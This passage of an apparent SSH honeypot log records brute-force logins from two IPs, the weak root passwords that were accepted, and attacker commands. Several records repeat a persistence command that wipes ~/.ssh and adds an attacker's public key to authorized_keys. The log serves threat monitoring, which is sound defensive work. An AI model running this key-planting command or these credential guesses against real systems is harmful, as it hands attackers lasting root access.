      "cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "lockr -ia .ssh"
  ],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
124.45.35.17
2026-06-30 16:26:22.464895 UTC
SUCCESSFUL LOGIN SCORE: 50

Credential acceptance event recorded. Target authentication: root / 3245gs5662d34

Record ID: bffc19a683dc
Client Version: SSH-2.0-libssh_0.11.1
Engagement Duration: 0.9s
HASSH Fingerprint: 03a80b21afa810682a776a7d42e5e6fb
{
  "id": "bffc19a683dc",
  "src_ip": "124.45.35.17",
  "start_time": "2026-06-30T16:26:22.464895Z",
  "end_time": "2026-06-30T16:26:23.406043Z",
  "duration": "0.9",
  "version": "SSH-2.0-libssh_0.11.1",
  "hassh": "03a80b21afa810682a776a7d42e5e6fb",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "3245gs5662d34"
  },
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 50,
  "tags": [
    "SUCCESSFUL LOGIN"
  ]
}
124.45.35.17
2026-06-30 16:26:20.266111 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34

Record ID: af1c03cd217b
Client Version: SSH-2.0-libssh_0.11.1
Engagement Duration: 2.1s
HASSH Fingerprint: 03a80b21afa810682a776a7d42e5e6fb
{
  "id": "af1c03cd217b",
  "src_ip": "124.45.35.17",
  "start_time": "2026-06-30T16:26:20.266111Z",
  "end_time": "2026-06-30T16:26:22.336388Z",
  "duration": "2.1",
  "version": "SSH-2.0-libssh_0.11.1",
  "hassh": "03a80b21afa810682a776a7d42e5e6fb",
  "attempts": [
    {
      "user": "345gs5662d34",
      "pass": "345gs5662d34"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
124.45.35.17
2026-06-30 16:26:18.356767 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: root / odoo123

Remote entity achieved interactive shell state. Command sequence (2 executed):

[obs-node]:~$ cd ~; chattr -ia .ssh; lockr -ia .ssh
Command not found: lockr -ia .ssh
[obs-node]:~$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Record ID: 9e90c9c3ab83
Client Version: SSH-2.0-libssh_0.11.1
Engagement Duration: 5.0s
HASSH Fingerprint: 03a80b21afa810682a776a7d42e5e6fb
{
  "id": "9e90c9c3ab83",
  "src_ip": "124.45.35.17",
  "start_time": "2026-06-30T16:26:18.356767Z",
  "end_time": "2026-06-30T16:26:23.402359Z",
  "duration": "5.0",
  "version": "SSH-2.0-libssh_0.11.1",
  "hassh": "03a80b21afa810682a776a7d42e5e6fb",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "odoo123"
  },
  "commands": [
    "cd ~; chattr -ia .ssh; lockr -ia .ssh",
    "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
  ],
  "detailed_commands": [
    {
      "cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
      "failed": true,
      "error": "Command not found: lockr -ia .ssh"
    },
    {
      "cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "lockr -ia .ssh"
  ],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
46.147.113.91
2026-06-30 16:26:02.138733 UTC
SUCCESSFUL LOGIN SCORE: 50

Credential acceptance event recorded. Target authentication: root / 3245gs5662d34

Record ID: 802bd9817a76
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 1.2s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "802bd9817a76",
  "src_ip": "46.147.113.91",
  "start_time": "2026-06-30T16:26:02.138733Z",
  "end_time": "2026-06-30T16:26:03.386528Z",
  "duration": "1.2",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "3245gs5662d34"
  },
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 50,
  "tags": [
    "SUCCESSFUL LOGIN"
  ]
}
46.147.113.91
2026-06-30 16:25:59.626350 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34

Record ID: f1bdf694ce46
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 2.3s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "f1bdf694ce46",
  "src_ip": "46.147.113.91",
  "start_time": "2026-06-30T16:25:59.626350Z",
  "end_time": "2026-06-30T16:26:01.942039Z",
  "duration": "2.3",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "345gs5662d34",
      "pass": "345gs5662d34"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
46.147.113.91
2026-06-30 16:25:56.946923 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: root / P@ssw0rd!234

Remote entity achieved interactive shell state. Command sequence (2 executed):

[obs-node]:~$ cd ~; chattr -ia .ssh; lockr -ia .ssh
Command not found: lockr -ia .ssh
[obs-node]:~$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Record ID: 4d2dd59f9352
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 6.4s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "4d2dd59f9352",
  "src_ip": "46.147.113.91",
  "start_time": "2026-06-30T16:25:56.946923Z",
  "end_time": "2026-06-30T16:26:03.389465Z",
  "duration": "6.4",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "P@ssw0rd!234"
  },
  "commands": [
    "cd ~; chattr -ia .ssh; lockr -ia .ssh",
    "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
  ],
  "detailed_commands": [
    {
      "cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
      "failed": true,
      "error": "Command not found: lockr -ia .ssh"
    },
    {
      "cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "lockr -ia .ssh"
  ],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}